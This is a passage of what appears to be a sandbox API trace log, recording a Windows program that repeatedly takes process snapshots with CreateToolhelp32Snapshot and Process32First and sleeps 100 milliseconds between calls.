hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.251] Sleep (dwMilliseconds=0x64) [0183.253] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0183.269] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.345] Sleep (dwMilliseconds=0x64) [0183.347] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0183.362] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.527] Sleep (dwMilliseconds=0x64) [0183.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0183.540] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.598] Sleep (dwMilliseconds=0x64) [0183.601] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0183.613] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.679] Sleep (dwMilliseconds=0x64) [0183.681] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0183.691] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.751] Sleep (dwMilliseconds=0x64) [0183.752] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0183.765] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.845] Sleep (dwMilliseconds=0x64) [0183.850] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0183.863] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.920] Sleep (dwMilliseconds=0x64) [0183.922] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0183.936] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.999] Sleep (dwMilliseconds=0x64) [0184.001] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0184.013] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.074] Sleep (dwMilliseconds=0x64) [0184.084] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ab4 [0184.100] Process32First (in: hSnapshot=0x1ab4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.159] Sleep (dwMilliseconds=0x64) [0184.191] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ab4 [0184.211] Process32First (in: hSnapshot=0x1ab4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.296] Sleep (dwMilliseconds=0x64) [0184.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ab4 [0184.316] Process32First (in: hSnapshot=0x1ab4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.380] Sleep (dwMilliseconds=0x64) [0184.385] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ab4 [0184.401] Process32First (in: hSnapshot=0x1ab4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.466] Sleep (dwMilliseconds=0x64) [0184.468] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ab4 [0184.484] Process32First (in: hSnapshot=0x1ab4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.623] Sleep (dwMilliseconds=0x64) [0184.626] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ab4 [0184.643] Process32First (in: hSnapshot=0x1ab4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.717] Sleep (dwMilliseconds=0x64) [0184.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ab4 [0184.735] Process32First (in: hSnapshot=0x1ab4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.818] Sleep (dwMilliseconds=0x64) [0184.819] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ab4 [0184.834] Process32First (in: hSnapshot=0x1ab4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.916] Sleep (dwMilliseconds=0x64) [0184.923] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ab4 [0184.945] Process32First (in: hSnapshot=0x1ab4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.053] Sleep (dwMilliseconds=0x64) [0185.055] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ab4 [0185.075] Process32First (in: hSnapshot=0x1ab4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.138] Sleep (dwMilliseconds=0x64) [0185.140] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ab4 [0185.156] Process32First (in: hSnapshot=0x1ab4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.290] Sleep (dwMilliseconds=0x64) [0186.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2438 [0186.403] Process32First (in: hSnapshot=0x2438, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.535] Sleep (dwMilliseconds=0x64) [0186.559] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23e0 [0186.599] Process32First (in: hSnapshot=0x23e0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.708] Sleep (dwMilliseconds=0x64) [0186.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23e0 [0186.737] Process32First (in: hSnapshot=0x23e0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.805] Sleep (dwMilliseconds=0x64) [0186.811] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2408 [0186.855] Process32First (in: hSnapshot=0x2408, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.000] Sleep (dwMilliseconds=0x64) [0187.049] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2408 [0187.081] Process32First (in: hSnapshot=0x2408, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.169] Sleep (dwMilliseconds=0x64) [0187.180] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2358 [0187.196] Process32First (in: hSnapshot=0x2358, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.367] Sleep (dwMilliseconds=0x64) [0187.371] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2358 [0187.402] Process32First (in: hSnapshot=0x2358, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.482] Sleep (dwMilliseconds=0x64) [0187.485] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0187.498] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.561] Sleep (dwMilliseconds=0x64) [0187.563] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0187.575] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.689] Sleep (dwMilliseconds=0x64) [0187.690] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0187.711] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.793] Sleep (dwMilliseconds=0x64) [0187.795] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0187.811] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.907] Sleep (dwMilliseconds=0x64) [0187.910] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0187.930] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.007] Sleep (dwMilliseconds=0x64) [0188.009] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0188.034] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.124] Sleep (dwMilliseconds=0x64) [0188.126] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0188.148] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.236] Sleep (dwMilliseconds=0x64) [0188.237] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0188.248] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.319] Sleep (dwMilliseconds=0x64) [0188.321] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0188.335] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.541] Sleep (dwMilliseconds=0x64) [0188.542] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0188.562] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.655] Sleep (dwMilliseconds=0x64) [0188.666] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0188.683] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.755] Sleep (dwMilliseconds=0x64) [0188.756] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0188.768] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.820] Sleep (dwMilliseconds=0x64) [0188.823] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0188.834] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.928] Sleep (dwMilliseconds=0x64) [0188.930] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0188.947] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.045] Sleep (dwMilliseconds=0x64) [0189.046] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0189.076] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.157] Sleep (dwMilliseconds=0x64) [0189.159] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0189.175] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.242] Sleep (dwMilliseconds=0x64) [0189.244] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0189.257] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.328] Sleep (dwMilliseconds=0x64) [0189.329] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0189.340] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.390] Sleep (dwMilliseconds=0x64) [0189.399] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2430 [0189.411] Process32First (in: hSnapshot=0x2430, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.458] Sleep (dwMilliseconds=0x64) [0189.462] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0189.500] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.548] Sleep (dwMilliseconds=0x64) [0189.557] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0189.566] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.611] Sleep (dwMilliseconds=0x64) [0189.612] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0189.660] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.706] Sleep (dwMilliseconds=0x64) [0189.707] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0189.715] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.764] Sleep (dwMilliseconds=0x64) [0189.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0189.778] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.822] Sleep (dwMilliseconds=0x64) [0189.824] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0189.833] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.934] Sleep (dwMilliseconds=0x64) [0189.936] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0189.944] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.988] Sleep (dwMilliseconds=0x64) [0189.990] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0189.998] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.054] Sleep (dwMilliseconds=0x64) [0190.056] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.064] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.108] Sleep (dwMilliseconds=0x64) [0190.110] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.118] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.163] Sleep (dwMilliseconds=0x64) [0190.164] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.172] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.215] Sleep (dwMilliseconds=0x64) [0190.221] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.231] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.275] Sleep (dwMilliseconds=0x64) [0190.277] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0190.285] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 